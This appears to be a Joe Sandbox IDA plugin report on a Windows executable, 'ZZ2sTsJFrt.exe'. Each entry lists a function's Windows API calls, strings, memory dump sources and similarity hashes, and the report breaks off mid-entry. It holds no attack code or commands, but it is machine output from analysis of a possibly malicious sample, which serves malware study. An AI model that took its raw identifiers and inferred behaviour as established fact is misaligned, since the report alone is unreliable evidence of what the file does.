                                                                          • Instruction Fuzzy Hash: AA01FC33A44318BBD2114F659D09F9B777DEBABB12F110411F306A20D1C7E29A48BB76
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F27E24,00000000,?,00F27DC4,00000000,00F3C300,0000000C,00F27F1B,00000000,00000002), ref: 00F27E93
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F27EA6
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00F27E24,00000000,?,00F27DC4,00000000,00F3C300,0000000C,00F27F1B,00000000,00000002), ref: 00F27EC9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: a1d2b426435254f2a8801f090f100445f75cb966a5feca7b811ce274ffa9f25a
                                                                          • Instruction ID: 7d1b3b286c2e69fb202b0cc09b8fc6b25dfa55ca4fc831817bcd2dd18288bea6
                                                                          • Opcode Fuzzy Hash: a1d2b426435254f2a8801f090f100445f75cb966a5feca7b811ce274ffa9f25a
                                                                          • Instruction Fuzzy Hash: 35F06831E0461CBBCB15DFA4DC09B9EBFB5EF44725F0180A9F805E2260DB349E44EAA1
                                                                          APIs
                                                                            • Part of subcall function 00F1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F10836
                                                                            • Part of subcall function 00F1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0F2D8,Crypt32.dll,00000000,00F0F35C,?,?,00F0F33E,?,?,?), ref: 00F10858
                                                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F0F2E4
                                                                          • GetProcAddress.KERNEL32(00F481C8,CryptUnprotectMemory), ref: 00F0F2F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                          • API String ID: 2141747552-1753850145
                                                                          • Opcode ID: d0f6b11c94d71dda8e5e1c141b43bf5603229268cb8469b3654767ada3188269
                                                                          • Instruction ID: e784d41f2e1fdb3d012802a9ebcec3ae02a7ff38c6c13e90fb33134798786f38
                                                                          • Opcode Fuzzy Hash: d0f6b11c94d71dda8e5e1c141b43bf5603229268cb8469b3654767ada3188269
                                                                          • Instruction Fuzzy Hash: 70E046B4910706AECB30DF789949B42BAD46F04734F14882DE0DAE3A94DABCE584BB51
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer$_abort
                                                                          • String ID:
                                                                          • API String ID: 2252061734-0
                                                                          • Opcode ID: 088e2150006c5d3e39fe8212793e13e5d6c371271ab74a0a707c82dd4ccaa471
                                                                          • Instruction ID: e439bbb5d0ba35196c17a41e88e8f446609f50304d0a72d8a353df80c1729e7e
                                                                          • Opcode Fuzzy Hash: 088e2150006c5d3e39fe8212793e13e5d6c371271ab74a0a707c82dd4ccaa471
                                                                          • Instruction Fuzzy Hash: A251D172A00222BFDB698F14F845BAAB3A4FF54320F64412DEC05576A1D775ED80FB90
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00F2BF39
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2BF5C
                                                                            • Part of subcall function 00F28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F2BF82
                                                                          • _free.LIBCMT ref: 00F2BF95
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F2BFA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                          • String ID:
                                                                          • API String ID: 336800556-0
                                                                          • Opcode ID: 9800ef3ce7ebb34edecca0555573fe5645c1d20219242960915e36702113266a
                                                                          • Instruction ID: 454c4867306ccac21df8513a78cbf6cc510d57897d15bdaf8321a0bef5418830
                                                                          • Opcode Fuzzy Hash: 9800ef3ce7ebb34edecca0555573fe5645c1d20219242960915e36702113266a
                                                                          • Instruction Fuzzy Hash: C601B162A02A267F232166B67D49C7B7B6DDEC2BB13150129FD04C2105EF648D02B5B0
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00F291AD,00F2B188,?,00F29813,00000001,00000364,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F2986E
                                                                          • _free.LIBCMT ref: 00F298A3
                                                                          • _free.LIBCMT ref: 00F298CA
                                                                          • SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F298D7
                                                                          • SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F298E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$_free
                                                                          • String ID:
                                                                          • API String ID: 3170660625-0
                                                                          • Opcode ID: 9561825deedd86b63efd9f14b5c2eafcd73d0a2ab6cea4e4002f4f0d72b8ee82
                                                                          • Instruction ID: 737ba87e8b305b6cdfb9b67109273a2e3bb685eaa1f7a761b0c4ba980daa91fa
                                                                          • Opcode Fuzzy Hash: 9561825deedd86b63efd9f14b5c2eafcd73d0a2ab6cea4e4002f4f0d72b8ee82
                                                                          • Instruction Fuzzy Hash: 76014433509A356BD3126374BC95A9B362AEFC23B0F690034F51093192EEB88C0B7221
                                                                          APIs
                                                                            • Part of subcall function 00F111CF: ResetEvent.KERNEL32(?), ref: 00F111E1
                                                                            • Part of subcall function 00F111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00F111F5
                                                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00F10F21
                                                                          • CloseHandle.KERNEL32(?,?), ref: 00F10F3B
                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 00F10F54
                                                                          • CloseHandle.KERNEL32(?), ref: 00F10F60
                                                                          • CloseHandle.KERNEL32(?), ref: 00F10F6C
                                                                            • Part of subcall function 00F10FE4: WaitForSingleObject.KERNEL32(?,000000FF,00F11206,?), ref: 00F10FEA
                                                                            • Part of subcall function 00F10FE4: GetLastError.KERNEL32(?), ref: 00F10FF6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                          • String ID:
                                                                          • API String ID: 1868215902-0
                                                                          • Opcode ID: 018f3d3a8507708ada0ca47d7f11f95aefe94aa7ceef7623212129010faa21f1
                                                                          • Instruction ID: 7a188383f7d8347f7d1a066e8e1e3367e7b8c40f425727a1898c64ba472ae828
                                                                          • Opcode Fuzzy Hash: 018f3d3a8507708ada0ca47d7f11f95aefe94aa7ceef7623212129010faa21f1
                                                                          • Instruction Fuzzy Hash: 190175B5500744EFC726DB64DC85BC6FBAAFB08725F000929F25B92160CBB57A85EB50
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00F2C817
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F2C829
                                                                          • _free.LIBCMT ref: 00F2C83B
                                                                          • _free.LIBCMT ref: 00F2C84D
                                                                          • _free.LIBCMT ref: 00F2C85F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: 7a92d7079690c5271157a582a21b2aa54c98689ce7c190dc7577559281010e5b
                                                                          • Instruction ID: 99d07061ce98d57bc2ddfdf5383dff8e0f66b24dfcbb6d51d7bc114bb8e6a210
                                                                          • Opcode Fuzzy Hash: 7a92d7079690c5271157a582a21b2aa54c98689ce7c190dc7577559281010e5b
                                                                          • Instruction Fuzzy Hash: 3CF01232906224AB9620DB68F885C5B73EAAE007747A55C19F148D75A2CB74FC81EAA4
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00F11FE5
                                                                          • _wcslen.LIBCMT ref: 00F11FF6
                                                                          • _wcslen.LIBCMT ref: 00F12006
                                                                          • _wcslen.LIBCMT ref: 00F12014
                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00F0B371,?,?,00000000,?,?,?), ref: 00F1202F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$CompareString
                                                                          • String ID:
                                                                          • API String ID: 3397213944-0
                                                                          • Opcode ID: f228500a95e9fa470f39b2ad61dd2d05108e8a818ae9c7972144456872a4e42d
                                                                          • Instruction ID: 96d5375faee63a64b89ebc4727df68e4bcead780887bbb60ce756d307fa458c3
                                                                          • Opcode Fuzzy Hash: f228500a95e9fa470f39b2ad61dd2d05108e8a818ae9c7972144456872a4e42d
                                                                          • Instruction Fuzzy Hash: 57F03073008024BFCF266F91EC09DCE7F26EB44770B128415F65A5B061CB76DAA9E6D0
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00F2891E
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F28930
                                                                          • _free.LIBCMT ref: 00F28943
                                                                          • _free.LIBCMT ref: 00F28954
                                                                          • _free.LIBCMT ref: 00F28965
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: 9e299ec2172599c53c07a308eb7515cfa9864af94511b6946d74b53db384634e
                                                                          • Instruction ID: 2b5cef7028f1dc9197cc2a22f6eec40c9cfaac66c94edd005e14100dccb7dd08
                                                                          • Opcode Fuzzy Hash: 9e299ec2172599c53c07a308eb7515cfa9864af94511b6946d74b53db384634e
                                                                          • Instruction Fuzzy Hash: F8F05E7181393ACBE6866F14FC024093FB5FB247603410A16F024922B6CFBE499BFB81
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _swprintf
                                                                          • String ID: %ls$%s: %s
                                                                          • API String ID: 589789837-2259941744
                                                                          • Opcode ID: bee013198e8ea4f1d9c8d38b1d835596d44d51d40275f6386f2ff8f55ee413e3
                                                                          • Instruction ID: 9d2691f6e063468ab1c5fbe3b176276223efd8e7b4ec81227db40ed92c7bd387
                                                                          • Opcode Fuzzy Hash: bee013198e8ea4f1d9c8d38b1d835596d44d51d40275f6386f2ff8f55ee413e3
                                                                          • Instruction Fuzzy Hash: 5A51F637688304FAF7211AA08D46FF57265BB05B14F28C947F386644E1D9A7A8D0BB1F
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ZZ2sTsJFrt.exe,00000104), ref: 00F27FAE
                                                                          • _free.LIBCMT ref: 00F28079
                                                                          • _free.LIBCMT ref: 00F28083
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$FileModuleName
                                                                          • String ID: C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                          • API String ID: 2506810119-1016543536
                                                                          • Opcode ID: 81398acdec099085405749a1d9ab6fcd97579bbd31af20033299a7b53dc90eed
                                                                          • Instruction ID: 02dee4d98013e7d6a5712fc81b07a2b3612820384f02d7d59d9ae3753c952244
                                                                          • Opcode Fuzzy Hash: 81398acdec099085405749a1d9ab6fcd97579bbd31af20033299a7b53dc90eed
                                                                          • Instruction Fuzzy Hash: D131C471E05228AFDB21DF99EC8099EBBBCEF85350F104166F80497211DBB58E45EB91
                                                                          APIs
                                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F231FB
                                                                          • _abort.LIBCMT ref: 00F23306
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer_abort
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 948111806-2084237596
                                                                          • Opcode ID: 45cba5c8d359c677a9f2287c8eefce7fe5693ae94345140d622b36475679bf90
                                                                          • Instruction ID: 053724d11c312f9d8a5ce73d1888102320358191e6852867ad669fdd4d3045e4
                                                                          • Opcode Fuzzy Hash: 45cba5c8d359c677a9f2287c8eefce7fe5693ae94345140d622b36475679bf90
                                                                          • Instruction Fuzzy Hash: 974159B1D00229EFCF16DF94EC81AEEBBB5BF08314F158059F90467251D739AA50EB50
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F07406
                                                                            • Part of subcall function 00F03BBA: __EH_prolog.LIBCMT ref: 00F03BBF
                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00F074CD
                                                                            • Part of subcall function 00F07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07AAB
                                                                            • Part of subcall function 00F07A9C: GetLastError.KERNEL32 ref: 00F07AF1
                                                                            • Part of subcall function 00F07A9C: CloseHandle.KERNEL32(?), ref: 00F07B00
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                          • API String ID: 3813983858-639343689
                                                                          • Opcode ID: 8d44ba95ede59ebd888d45bc0454b8a00c7ca03fbd9b4db2d56c8077ddd2f14e
                                                                          • Instruction ID: 9299e7866fb33358a1db266ec6d5f840ab1d3ade8db96ad4803b39cfb9a40a2c
                                                                          • Opcode Fuzzy Hash: 8d44ba95ede59ebd888d45bc0454b8a00c7ca03fbd9b4db2d56c8077ddd2f14e
                                                                          • Instruction Fuzzy Hash: 5131D4B1E04358AADF11EBA4CC45BFE7BA9BF05324F044055F805A72D2C778AA84FB61
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1AD98
                                                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00F1ADAD
                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F1ADC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemText$DialogWindow
                                                                          • String ID: ASKNEXTVOL
                                                                          • API String ID: 445417207-3402441367
                                                                          • Opcode ID: 9ee767e4fb632d620408ea913ce7f86986b6a4fd0f6fa642f75c7b4520d77dcb
                                                                          • Instruction ID: 4893235552269d8d7585af93db1f2f7508dab89b0ddfab8e323397c094a99b75
                                                                          • Opcode Fuzzy Hash: 9ee767e4fb632d620408ea913ce7f86986b6a4fd0f6fa642f75c7b4520d77dcb
                                                                          • Instruction Fuzzy Hash: AE11E232A41614BFD3228F68EC45FEA3B69FF4B712F040000F241DB4A4C7A29985B723
                                                                          APIs
                                                                          • __fprintf_l.LIBCMT ref: 00F0D954
                                                                          • _strncpy.LIBCMT ref: 00F0D99A
                                                                            • Part of subcall function 00F11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F41030,00000200,00F0D928,00000000,?,00000050,00F41030), ref: 00F11DC4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
